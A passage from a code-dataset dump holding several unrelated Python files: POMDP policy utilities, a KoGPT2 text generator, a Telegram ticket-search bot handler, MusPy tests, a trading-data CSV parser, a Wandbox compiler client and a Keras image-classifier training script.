one action\n for action in actions:\n if action in policy:\n value = findBestValue(action, policy[action], beliefState)\n if value > bestValue:\n bestValue = value\n bestAction = action\n return bestAction\n\n\ndef findBestValue(action, hyperplanes, beliefs):\n bestValue = -129837198273981231\n bestHyperplane = []\n for hyperplane in hyperplanes:\n dontUse = False\n for (b, entry) in zip(beliefs, hyperplane):\n if b != 0 and entry == '*':\n dontUse = True\n break\n if dontUse:\n continue\n value = dot(beliefs, hyperplane)\n if value > bestValue:\n bestHyperplane = hyperplane\n bestValue = value\n #print beliefs\n #print bestHyperplane\n return bestValue\n\n\ndef getMostLikelyDifficulty(belief, difficulties):\n numDiffs = len(difficulties)\n bestState = -1\n bestProb = 0\n for i in range(0, 2):\n for j in range(0, numDiffs):\n diff = difficulties[j]\n state = i * numDiffs + j\n if belief[state] > bestProb:\n bestState = diff\n bestProb = belief[state]\n return bestState\n\n\ndef updateBelief(prevBelief #action\n , observation, difficulties, gamma):\n newBeliefs = []\n numDiffs = len(difficulties)\n for i in range(0, 2):\n for j in range(0, numDiffs):\n #for k in range(0, numDiffs):\n diff = difficulties[j]\n state = (i * numDiffs) + j\n #if action == 0: #BALLOT A\n if observation == i:\n newBeliefs.append(calcAccuracy(gamma, diff) * prevBelief[state])\n else:\n newBeliefs.append((1 - calcAccuracy(gamma, diff)) * prevBelief[state])\n #else: #BALLOT B\n # if observation == i:\n # newBeliefs.append(calcAccuracy(bGamma, diffB) *\n # prevBelief[state])\n # else:\n # newBeliefs.append((1-calcAccuracy(bGamma, diffB)) *\n # prevBelief[state])\n newBeliefs.append(0.0)\n normalize(newBeliefs)\n return newBeliefs\n\n\ndef readPolicy(policyfile, numStates):\n policy = {}\n lines = open(policyfile, 'r').read().split(\"\\n\")\n\n numPlanes = 0\n action = 0\n alpha = [0 for k in range(0, numStates)]\n insideEntries = False\n for i in range(0, len(lines)):\n line = lines[i]\n #First we ignore a bunch of lines at the beginning\n if (line.find('#') != -1 or line.find('{') != -1 or\n line.find('policyType') != -1 or line.find('}') != -1 or\n line.find('numPlanes') != -1 or\n ((line.find(']') != -1) and not insideEntries) or\n line.find('planes') != -1 or line == ''):\n continue\n if line.find('action') != -1:\n words = line.strip(', ').split(\" => \")\n action = int(words[1])\n continue\n if line.find('numEntries') != -1:\n continue\n if line.find('entries') != -1:\n insideEntries = True\n continue\n if (line.find(']') != -1) and insideEntries: #We are done with one alpha vector\n if action not in policy:\n policy[action] = []\n policy[action].append(alpha)\n action = 0\n alpha = ['*' for k in range(0, numStates)]\n numPlanes += 1\n insideEntries = False\n continue\n #If we get here, we are reading state value pairs\n entry = line.split(\",\")\n state = int(entry[0])\n val = float(entry[1])\n alpha[state] = val\n\n return policy\n\n\n\n","sub_path":"ModelLearning/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"615827566","text":"import torch\nfrom transformers import GPT2LMHeadModel\nimport tokenizer\nfrom transformers import PreTrainedTokenizerFast\nimport sys\n\ntokenizer = PreTrainedTokenizerFast.from_pretrained(\"skt/kogpt2-base-v2\",\n bos_token='', eos_token='', unk_token='',\n pad_token='', mask_token='')\n\nmodel = 
GPT2LMHeadModel.from_pretrained('skt/kogpt2-base-v2')\n\nsents = ' '\ninputArgs = sys.argv\nfor i in range(1, len(inputArgs)):\n # i is a number, from 1 to len(inputArgs)-1\n text = sys.argv[i]\n sents = sents +' '+ text\n#text = '피부의 조직이 괴사된다면 '\ninput_ids = tokenizer.encode(sents)\ngen_ids = model.generate(torch.tensor([input_ids]),\n max_length=150,\n repetition_penalty=2.0,\n pad_token_id=tokenizer.pad_token_id,\n eos_token_id=tokenizer.eos_token_id,\n bos_token_id=tokenizer.bos_token_id,\n use_cache=True)\ngenerated = tokenizer.decode(gen_ids[0,:].tolist())\nprint(generated)","sub_path":"sentence_generation.py","file_name":"sentence_generation.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"8250031","text":"import traceback\n\nimport telegram\nfrom telegram import chataction\nfrom telegram.ext.dispatcher import run_async\n\nfrom mayday import LogConfig\nfrom mayday.constants import conversations, stages\nfrom mayday.constants.replykeyboards import ReplyKeyboards\nfrom mayday.features import search\nfrom mayday.helpers.quick_search_helper import QuickSearchHelper\nfrom mayday.utils import log_util\n\nquick_search_helper = QuickSearchHelper('quick_search')\nKEYBOARDS = ReplyKeyboards()\nflogger = LogConfig.flogger\n\n\n@run_async\ndef start(bot, update, user_data):\n try:\n telegram_info = update._effective_user\n callback_data = update.callback_query.data\n ticket = quick_search_helper.init_cache(user_id=telegram_info.id,\n username=telegram_info.username)\n\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data\n )\n flogger.info(msg)\n\n bot.edit_message_text(\n text=conversations.QUICK_SEARCH_START,\n chat_id=telegram_info.id,\n message_id=update.callback_query.message.message_id,\n reply_markup=KEYBOARDS.quick_search_start_keyboard_markup,\n parse_mode=telegram.ParseMode.MARKDOWN\n )\n return stages.QUICK_SEARCH_MODE_SELECTION\n except Exception:\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data,\n extra=str(update),\n trace_back=str(traceback.format_exc())\n )\n flogger.error(msg)\n\n\n@run_async\ndef select_mode(bot, update, user_data):\n try:\n telegram_info = update._effective_user\n callback_data = update.callback_query.data\n message = update.callback_query.message\n\n if callback_data == 'mainpanel':\n\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data\n )\n flogger.info(msg)\n\n bot.edit_message_text(\n chat_id=telegram_info.id,\n message_id=message.message_id,\n text=conversations.MAIN_PANEL_START.format_map({'username': telegram_info.username}),\n reply_markup=KEYBOARDS.actions_keyboard_markup,\n parse_mode=telegram.ParseMode.MARKDOWN\n )\n return stages.MAIN_PANEL\n\n if callback_data == 'cached_condition':\n\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data\n )\n flogger.info(msg)\n\n search.quick_search_start(bot, update, user_data)\n return stages.QUICK_SEARCH_LIST\n\n if callback_data == 'matching_my_ticket':\n if quick_search_helper.get_lastest_auth(telegram_info) is False:\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n 
callback_data='auth',\n error='banned'\n )\n flogger.warning(msg)\n\n update.message.reply_text(conversations.MAIN_PANEL_YELLOWCOW)\n return stages.END\n\n bot.send_chat_action(\n chat_id=telegram_info.id,\n action=chataction.ChatAction.TYPING\n )\n result = quick_search_helper.get_my_ticket_matching(user_id=telegram_info.id)\n\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data,\n rtn_ticket=result\n )\n flogger.info(msg)\n\n if result.get('status'):\n tickets = result.get('info')\n if (tickets and len(tickets) <= 25):\n bot.send_message(\n text=conversations.SEARCH_WITH_RESULTS,\n chat_id=telegram_info.id,\n message_id=message.message_id\n\n )\n traits = quick_search_helper.generate_tickets_traits(tickets)\n for trait in traits:\n bot.send_message(\n text=quick_search_helper.tickets_tostr(trait),\n chat_id=telegram_info.id,\n message_id=message.message_id\n )\n elif len(tickets) > 25:\n bot.edit_message_text(\n text=conversations.SEARCH_TOO_MUCH_TICKETS,\n chat_id=telegram_info.id,\n message_id=message.message_id\n\n )\n else:\n bot.edit_message_text(\n text=conversations.SEARCH_WITHOUT_TICKETS,\n chat_id=telegram_info.id,\n message_id=message.message_id\n\n )\n bot.send_message(\n text=conversations.AND_THEN,\n chat_id=telegram_info.id,\n message_id=message.message_id,\n reply_markup=KEYBOARDS.quick_search_start_keyboard_markup,\n\n )\n else:\n\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data,\n rtn_ticket=result\n )\n flogger.error(msg)\n\n bot.send_message(\n text=conversations.SEARCH_TICKET_ERROR,\n chat_id=telegram_info.id,\n message_id=message.message_id\n )\n query = quick_search_helper.get_cache(user_id=telegram_info.id, username=telegram_info.username)\n bot.send_message(\n text=conversations.QUICK_SEARCH_START,\n chat_id=telegram_info.id,\n message_id=update.callback_query.message.message_id,\n reply_markup=KEYBOARDS.quick_search_start_keyboard_markup,\n parse_mode=telegram.ParseMode.MARKDOWN\n )\n return stages.QUICK_SEARCH_MODE_SELECTION\n except Exception:\n msg = log_util.get_ub_log(\n user_id=telegram_info.id,\n username=telegram_info.username,\n funcname=__name__,\n callback_data=callback_data,\n extra=str(update),\n trace_back=str(traceback.format_exc())\n )\n flogger.error(msg)\n","sub_path":"mayday/features/quick_search.py","file_name":"quick_search.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"484660307","text":"\"\"\"Test cases for MusPy classes.\"\"\"\nfrom muspy import Music, Note, Track\n\n\ndef test_repr():\n note = Note(time=0, duration=1, pitch=60)\n assert repr(note) == \"Note(time=0, pitch=60, duration=1, velocity=64)\"\n\n\ndef test_from_dict():\n note = Note.from_dict({\"time\": 0, \"duration\": 1, \"pitch\": 60})\n assert note.time == 0\n assert note.duration == 1\n assert note.pitch == 60\n\n\ndef test_to_ordered_dict():\n note = Note(time=0, duration=1, pitch=60)\n ordered_dict = note.to_ordered_dict()\n assert ordered_dict[\"time\"] == 0\n assert ordered_dict[\"duration\"] == 1\n assert ordered_dict[\"pitch\"] == 60\n\n\ndef test_append():\n track = Track()\n track.append(Note(time=0, duration=1, pitch=60))\n track.append(Note(time=1, duration=1, pitch=60))\n assert len(track) == 2\n\n\ndef test_remove_invalid():\n notes = [\n Note(time=-1, duration=1, pitch=60),\n 
Note(time=0, duration=1, pitch=60),\n ]\n track = Track(notes=notes)\n track.remove_invalid()\n assert len(track) == 1\n\n\ndef test_remove_duplicate():\n notes = [\n Note(time=0, duration=1, pitch=60),\n Note(time=0, duration=1, pitch=60),\n ]\n track = Track(notes=notes)\n track.remove_duplicate()\n assert len(track) == 1\n\n\ndef test_sort_track():\n notes = [\n Note(time=2, pitch=64, duration=1),\n Note(time=0, pitch=60, duration=1),\n Note(time=1, pitch=62, duration=1),\n ]\n track = Track(notes=notes)\n track.sort()\n\n # Answers\n times = (0, 1, 2)\n pitches = (60, 62, 64)\n\n for i, note in enumerate(track):\n assert note.time == times[i]\n assert note.pitch == pitches[i]\n\n\ndef test_sort_music():\n notes = [\n Note(time=2, pitch=64, duration=1),\n Note(time=0, pitch=60, duration=1),\n Note(time=1, pitch=62, duration=1),\n ]\n music = Music(tracks=[Track(notes=notes)])\n music.sort()\n\n # Answers\n times = (0, 1, 2)\n pitches = (60, 62, 64)\n\n for i, note in enumerate(music.tracks[0]):\n assert note.time == times[i]\n assert note.pitch == pitches[i]\n","sub_path":"tests/test_classes.py","file_name":"test_classes.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"301896767","text":"#!/usr/bin/env python\r\n\r\nfrom communicatorv2 import *\r\nimport socket\r\nimport re\r\n\r\ncurrent_values = \"\"\r\nlist = []\r\nrunning = 1\r\nmessage = \"\"\r\nconfigreader = config_reader()\r\naccept_thread = acceptor(running, list, \"RSC\", configreader.addresses)\r\naccept_thread.setDaemon(True)\r\naccept_thread.start()\r\nold_values = 20 \r\n\r\n# Method to retrieve the list of range sensor values.\r\ndef range_module(datastring):\r\n if datastring == \"+\" or datastring == \"\":\r\n return current_values\r\n split = datastring.split(\"+\")\r\n range_values = split[1].replace('{Range ', '')\r\n range_values = range_values.replace('}', '')\r\n datasplit = range_values.split(',')\r\n for i in range(len(datasplit)):\r\n if float(datasplit[i]) < 0:\r\n return current_values\r\n range_values = split[0] + \"+\" + range_values\r\n return range_values\r\n\r\nwhile running:\r\n data = accept_thread.memory[2]\r\n string = data.split('\\r\\n')\r\n for i in range(len(string)):\r\n datasplit = re.findall('\\{[^\\}]*\\}|\\S+', string[i])\r\n if len(datasplit) > 6:\r\n if datasplit[2] == \"{Type RangeScanner}\":\r\n message = datasplit[1] + \"+\"\r\n message += datasplit[6]\r\n if message != \"\":\r\n current_values = range_module(message)\r\n if current_values != old_values: \r\n old_values = current_values \r\n\r\n message = \"\"\r\n if current_values != \"\":\r\n while len(accept_thread.request_data) != 0:\r\n command = \"RCV!RSC!\" + current_values + \"#\"\r\n configreader.connection(list, accept_thread.request_data[0]).send(\r\n command)\r\n accept_thread.request_data.pop(0)\r\n\r\n","sub_path":"final/distributed/rangescanner.py","file_name":"rangescanner.py","file_ext":"py","file_size_in_byte":1714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"434694360","text":"# PyAlgoTrade\n# \n# Copyright 2012 Gabriel Martin Becedillas Ruiz\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed 
under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n.. moduleauthor:: Gabriel Martin Becedillas Ruiz \n\"\"\"\n\nfrom pyalgotrade.barfeed import csvfeed\nfrom pyalgotrade import bar\n\nimport datetime\n\n######################################################################\n## NinjaTrader CSV parser\n# Each bar must be on its own line and fields must be separated by semicolon (;).\n#\n# Minute Bars Format:\n# yyyyMMdd HHmmss;open price;high price;low price;close price;volume\n#\n# Daily Bars Format:\n# yyyyMMdd;open price;high price;low price;close price;volume\n\nclass Frequency:\n\tMINUTE = 1\n\tDAILY = 2\n\nclass RowParser(csvfeed.RowParser):\n\t# zone: The zone specifies the offset from Coordinated Universal Time (UTC, formerly referred to as \"Greenwich Mean Time\") \n\tdef __init__(self, frequency, zone = 0):\n\t\tself.__frequency = frequency\n\t\tself.__zone = zone\n\n\tdef __parseDateTime(self, dateTime):\n\t\tret = None\n\t\tif self.__frequency == Frequency.MINUTE:\n\t\t\tret = datetime.datetime.strptime(dateTime, \"%Y%m%d %H%M%S\")\n\t\t\tret += datetime.timedelta(hours= (-1 * self.__zone))\n\t\telif self.__frequency == Frequency.DAILY:\n\t\t\tret = datetime.datetime.strptime(dateTime, \"%Y%m%d\")\n\t\telse:\n\t\t\tassert(False)\n\t\treturn ret\n\n\tdef getFieldNames(self):\n\t\treturn [\"Date Time\", \"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]\n\n\tdef getDelimiter(self):\n\t\treturn \";\"\n\n\tdef parseBar(self, csvRowDict):\n\t\tdateTime = self.__parseDateTime(csvRowDict[\"Date Time\"])\n\t\tclose = float(csvRowDict[\"Close\"])\n\t\topen_ = float(csvRowDict[\"Open\"])\n\t\thigh = float(csvRowDict[\"High\"])\n\t\tlow = float(csvRowDict[\"Low\"])\n\t\tvolume = float(csvRowDict[\"Volume\"])\n\t\treturn bar.Bar(dateTime, open_, high, low, close, volume, None)\n\nclass Feed(csvfeed.BarFeed):\n\t\"\"\"A :class:`pyalgotrade.barfeed.BarFeed` that loads bars from a CSV file exported from NinjaTrader.\n\n\t:param frequency: The frequency of the bars.\n\n\t.. note::\n\n\t\tValid **frequency** parameter values are:\n\n\t\t * ninjatraderfeed.Frequency.MINUTE \n\t\t * ninjatraderfeed.Frequency.DAILY\n\t\"\"\"\n\n\tdef __init__(self, frequency):\n\t\tcsvfeed.BarFeed.__init__(self)\n\t\tself.__frequency = frequency\n\n\tdef addBarsFromCSV(self, instrument, path, timeZone = 0):\n\t\t\"\"\"Loads bars for a given instrument from a CSV formatted file.\n\t\tThe instrument gets registered in the bar feed.\n\t\t\n\t\t:param instrument: Instrument identifier.\n\t\t:type instrument: string.\n\t\t:param path: The path to the file.\n\t\t:type path: string.\n\t\t:param timeZone: The timezone for bars. 
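Given as an integer hour offset from UTC; minute bars are shifted by -timeZone hours when parsed. 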
0 if bar dates are in UTC.\n\t\t:type timeZone: int.\n\t\t\"\"\"\n\n\t\trowParser = RowParser(self.__frequency, timeZone)\n\t\tcsvfeed.BarFeed.addBarsFromCSV(self, instrument, path, rowParser)\n\n","sub_path":"pyalgotrade/barfeed/ninjatraderfeed.py","file_name":"ninjatraderfeed.py","file_ext":"py","file_size_in_byte":3209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"42297097","text":"#!/usr/bin/env python\n#\n# runner.py\n#\n\n\"\"\"\nWandbox runner for Python\n\"\"\"\n\nimport sys\nimport os\nimport codecs\n\nfrom .wandbox import Wandbox\n\n\ndef text_transform(value):\n try:\n if isinstance(value, str):\n return value.decode()\n # elif isinstance(value, unicode):\n # return value.encode('utf_8')\n except:\n pass\n return value\n\n\nclass Runner:\n \"\"\"wandbox Runner class\"\"\"\n\n def __init__(self, lang, compiler, save, encoding, retry, retry_wait, prefix_chars='-'):\n self.wandbox = Wandbox()\n self.language = lang\n self.compiler = compiler\n self.wandbox.compiler(self.compiler)\n self.retry = retry\n self.retry_wait = retry_wait\n self.prefix_chars = prefix_chars\n self.encoding = encoding\n self.switches = None\n self.wandbox.permanent_link(save)\n\n @staticmethod\n def ShowParameter(response):\n r = response\n if 'compiler' in r:\n print('compiler:' + r['compiler'])\n if 'options' in r:\n print('options:' + r['options'])\n if 'compiler-option-raw' in r:\n print('compiler-option-raw:' + r['compiler-option-raw'])\n if 'runtime-option-raw' in r:\n print('runtime-option-raw' + r['runtime-option-raw'])\n if 'created-at' in r:\n print(r['created-at'])\n\n @staticmethod\n def ShowResult(r, stderr=False):\n if 'error' in r:\n print(r['error'])\n return 1\n if stderr:\n if 'compiler_output' in r:\n print('compiler_output:')\n print(text_transform(r['compiler_output']))\n if 'compiler_error' in r:\n sys.stderr.write(text_transform(r['compiler_error']))\n if 'program_output' in r:\n print('program_output:')\n print(text_transform(r['program_output']))\n if 'program_error' in r:\n sys.stderr.write(text_transform(r['program_error']))\n else:\n if 'compiler_message' in r:\n print('compiler_message:')\n print(text_transform(r['compiler_message']))\n if 'program_message' in r:\n print('program_message:')\n print(text_transform(r['program_message']))\n if 'url' in r:\n print('permlink: ' + r['permlink'])\n print('url: ' + r['url'])\n if 'signal' in r:\n print('signal: ' + r['signal'])\n\n if 'status' in r:\n return int(r['status'])\n return 1\n\n @staticmethod\n def GetSwitches(compiler, retry, wait):\n for d in Wandbox.Call(Wandbox.GetCompilerList, retry, wait):\n if d['name'] == compiler:\n if 'switches' in d:\n return d['switches']\n\n @staticmethod\n def GetDefaultOptions(compiler, retry, wait):\n opt = []\n for s in Runner.GetSwitches(compiler, retry, wait):\n if s['type'] == 'select':\n opt.append(s['default'])\n elif s['type'] == 'single':\n if s['default']:\n opt.append(s['name'])\n return opt\n\n def get_switches(self):\n if not self.switches:\n self.switches = Runner.GetSwitches(self.compiler, self.retry, self.retry_wait)\n return self.switches\n\n def build_options(self, user_options=None, disable_options=None, use_default=True):\n options = []\n if use_default:\n switches = self.get_switches()\n tmp = [] if user_options is None else user_options\n for s in switches:\n if s['type'] == 'select':\n target = s['default']\n candidate = [x['name'] for x in s['options']]\n for opt in tmp:\n if opt in candidate:\n target = opt\n 
tmp.remove(opt)\n                            break\n                    options.append(target)\n                elif s['type'] == 'single':\n                    if s['default'] and (s['default'] in tmp):\n                        options.append(s['name'])\n        elif user_options:\n            options.extend(user_options)\n        if disable_options:\n            for dis in disable_options:\n                if dis in options:\n                    options.remove(dis)\n        self.wandbox.options(','.join(options))\n\n    def build_compiler_options(self, options):\n        codes = []\n        for opt in options:\n            if opt[0] in self.prefix_chars:\n                self.wandbox.add_compiler_options(opt)\n            else:\n                if os.path.isfile(opt):\n                    codes.append(opt)\n                else:\n                    self.wandbox.add_compiler_options(opt)\n        main_filepath = codes[0]\n        main_files = self.open_code(main_filepath, main_filepath)\n        for k, v in main_files.items():\n            if k == main_filepath:\n                self.wandbox.code(v)\n            else:\n                self.wandbox.add_file(k, v)\n\n        for filepath_ in codes[1:]:\n            filepath = filepath_.strip()\n            files = self.open_code(filepath, filepath)\n            self.wandbox.add_compiler_options(filepath)\n            for k, v in files.items():\n                self.wandbox.add_file(k, v)\n\n    def set_stdin(self, stdin):\n        if stdin:\n            self.wandbox.stdin(stdin)\n\n    def set_runtime_options(self, commandlines):\n        ro = '\\n'.join(commandlines)\n        ro = ro.replace('\\\\n', '\\n')\n        self.wandbox.runtime_options(ro)\n\n    def run(self):\n        return Wandbox.Call(lambda : self.wandbox.run(), self.retry, self.retry_wait)\n\n    def dump(self):\n        self.wandbox.dump()\n\n    def file_open(self, path, mode):\n        if self.encoding:\n            file = codecs.open(path, mode, self.encoding)\n        else:\n            file = open(path, mode)\n        return file\n\n    def open_code(self, filepath, filename):\n        if not os.path.exists(filepath):\n            sys.stderr.write('error: {0}: No such file or directory\\n'.format(filepath))\n            sys.exit(1)\n        return self.make_code(filepath, filename)\n\n    def make_code(self, filepath, filename):\n        code = ''\n        file = self.file_open(filepath, 'r')\n        code = file.read()\n        file.close()\n        return {filename: code}\n","sub_path":"wandbox/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":6384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"427599967","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Nov 22 09:30:58 2018\r\n\r\n@author: teranishis\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport pickle\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image\r\nfrom keras.models import Model\r\nfrom keras.layers import Input, Conv2D, Activation, MaxPool2D, BatchNormalization, Flatten, Dense, Dropout\r\nfrom keras.optimizers import Adam\r\nfrom keras.utils import np_utils\r\nfrom keras.utils import to_categorical\r\nfrom keras.utils import Sequence\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom sklearn.model_selection import train_test_split\r\nfrom keras.callbacks import ReduceLROnPlateau, ModelCheckpoint\r\nfrom sklearn.model_selection import KFold\r\nimport keras.backend as K\r\nimport tensorflow as tf\r\n\r\nconfig = tf.ConfigProto(allow_soft_placement=True)\r\nconfig.gpu_options.allow_growth = True\r\nK.set_session(tf.Session(config=config))\r\n\r\n# Load the images\r\n# Build the training data\r\nimage_list = []\r\nlabel_list = []\r\n\r\n# Read the images from the directories under ./images/\r\nfor dir in os.listdir(\"./images\"):\r\n    if dir == \".DS_Store\":\r\n        continue\r\n    \r\n    dir1 = \"./images/\" + dir\r\n    
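# NOTE: the folder name doubles as the class id; given the call to\r\n    # np_utils.to_categorical(label_list, 37) below, the folders are expected\r\n    # to be named \"0\" through \"36\".\r\n    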
# The label of folder \"0\" is 0, of folder \"1\" is 1, and so on\r\n    label = dir\r\n    \r\n    for file in os.listdir(dir1):\r\n        # Append the ground-truth label to label_list\r\n        label_list.append(label)\r\n        filepath = dir1 + \"/\" + file\r\n        # Read the image, convert it to RGB, resize it to 150x150 pixels and turn it into a numpy array\r\n        # Each pixel value is in the range 0-255\r\n        image = np.array(Image.open(filepath).convert(\"RGB\").resize((150, 150)))\r\n        #print(filepath)\r\n        # Optionally flatten into a 1-D array (kept disabled)\r\n        #image = image.reshape(1, 784).astype(\"float32\")[0]\r\n        # Append the finished array to image_list\r\n        image_list.append(image)\r\n        \r\n# Convert to numpy arrays before handing them to Keras\r\nimage_list = np.array(image_list)\r\nlabel_list = np.array(label_list)\r\n\r\n# Convert the labels to one-hot (categorical) format\r\nlabel_list = np_utils.to_categorical(label_list, 37)\r\n\r\n# Training and test data (split kept disabled)\r\n#X_t, X_test, y_t, y_test = train_test_split(image_list, label_list, test_size = 0.3)\r\n#X_train, X_val, y_train, y_val = train_test_split(X_t, y_t, test_size = 0.2)\r\n\r\n# Cross-validation with KFold\r\nkf = KFold(n_splits=10, shuffle = True)\r\nindex = 0\r\nfor train_index, eval_index in kf.split(image_list):\r\n    x_train, x_eval = image_list[train_index], image_list[eval_index]\r\n    y_train, y_eval = label_list[train_index], label_list[eval_index]\r\n    \r\n    model_weights = \"./w/dog_cat_cnn_model[%d].h5\" % index\r\n    index = index + 1\r\n    \r\n    # Data Augmentation\r\n    datagen = ImageDataGenerator(\r\n        rescale = 1./255,\r\n        featurewise_center = True,\r\n        featurewise_std_normalization = True,\r\n        #rotation_range=20,\r\n        width_shift_range=0.2,\r\n        height_shift_range=0.2,\r\n        channel_shift_range=50,\r\n        horizontal_flip = True)\r\n    validationgen = ImageDataGenerator(rescale=1./255)\r\n    \r\n    datagen.fit(x_train)\r\n    validationgen.fit(x_eval)\r\n    \r\n    # Model\r\n    input = Input(shape=(150, 150, 3))\r\n    X = Conv2D(64, (1, 1), padding = \"same\")(input)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = Conv2D(64, (3, 3), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = Conv2D(64, (3, 3), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = MaxPool2D((2, 2), padding = \"same\")(X)\r\n    #X = Dropout(0.5)(X)\r\n\r\n    X = Conv2D(128, (1, 1), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = Conv2D(128, (3, 3), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = Conv2D(128, (3, 3), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = MaxPool2D((2, 2), padding = \"same\")(X)\r\n    #X = Dropout(0.5)(X)\r\n    \r\n    X = Conv2D(256, (1, 1), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = Conv2D(256, (3, 3), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = Conv2D(256, (3, 3), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = MaxPool2D((2, 2), padding = \"same\")(X)\r\n    #X = Dropout(0.5)(X)\r\n    \r\n    X = Conv2D(512, (1,1), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = Conv2D(512, (3, 3), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = Conv2D(512, (3, 3), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = MaxPool2D((2, 2), padding = \"same\")(X)\r\n    #X = Dropout(0.5)(X)\r\n    \r\n    X = Conv2D(512, (1,1), padding = \"same\")(X)\r\n    X = BatchNormalization()(X)\r\n    X = Activation(\"relu\")(X)\r\n    X = Conv2D(512, (3, 3), padding = \"same\")(X)\r\n    X = 
BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = Conv2D(512, (3, 3), padding = \"same\")(X)\r\n X = BatchNormalization()(X)\r\n X = Activation(\"relu\")(X)\r\n X = MaxPool2D((2, 2), padding = \"same\")(X)\r\n X = Dropout(0.5)(X)\r\n \r\n X = Flatten()(X)\r\n X = Dense(4096, activation = \"relu\")(X)\r\n #X = Dropout(0.5)(X)\r\n X = Dense(4096, activation = \"relu\")(X)\r\n X = Dropout(0.5)(X)\r\n #X = Dense(1000, activation = \"relu\")(X)\r\n #X = Dropout(0.5)(X)\r\n output = Dense(37, activation=\"softmax\")(X)\r\n \r\n model = Model(input, output)\r\n \r\n # compile\r\n model.compile(optimizer=Adam(lr = 1e-4), loss = \"categorical_crossentropy\",\r\n metrics=[\"accuracy\"])\r\n # save the model weights used for evaluation\r\n checkpointer = ModelCheckpoint(model_weights, monitor = \"val_loss\", verbose = 1,\r\n save_best_only = True)\r\n\r\n # fit\r\n reduce_lr = ReduceLROnPlateau(monitor = \"val_loss\", factor = 0.5, patience = 10,min_lr = 0, verbose = 1)\r\n history = model.fit_generator(datagen.flow(x_train, y_train, batch_size = 40),\r\n steps_per_epoch = len(x_train) / 32, validation_data=validationgen.flow(x_eval, y_eval),\r\n epochs = 10, validation_steps = len(x_eval), callbacks = [reduce_lr, checkpointer], shuffle = True)\r\n #history = model.fit_generator(generator = train_gen, epochs = 1000, steps_per_epoch=len(X_train), \r\n # verbose = 1, validation_data = valid_gen, validation_steps = len(valid_gen))\r\n \r\nwith open(\"history.dat\", \"wb\") as fp:\r\n pickle.dump(history, fp)\r\n \r\n# save the model and its weights\r\njson_string = model.to_json()\r\nopen(\"dog_cat_cnn.json\", \"w\").write(json_string)\r\nmodel.save_weights(\"dog_cat_cnn.h5\")\r\n\r\n# show the model summary\r\nmodel.summary()\r\n\"\"\"\r\n# evaluation\r\nscore = model.evaluate(X_test, y_test, verbose=0)\r\nprint(\"test loss:\", score[0])\r\nprint(\"test accuracy:\",score[1])\r\n\"\"\"\r\n# plot the training loss and accuracy\r\nacc = history.history[\"acc\"]\r\nval_acc = history.history[\"val_acc\"]\r\nloss = history.history[\"loss\"]\r\nval_loss = history.history[\"val_loss\"]\r\nepochs = range(1, len(acc) + 1)\r\n\r\n# plot accuracy\r\nplt.plot(epochs, acc, \"o\", label=\"Training 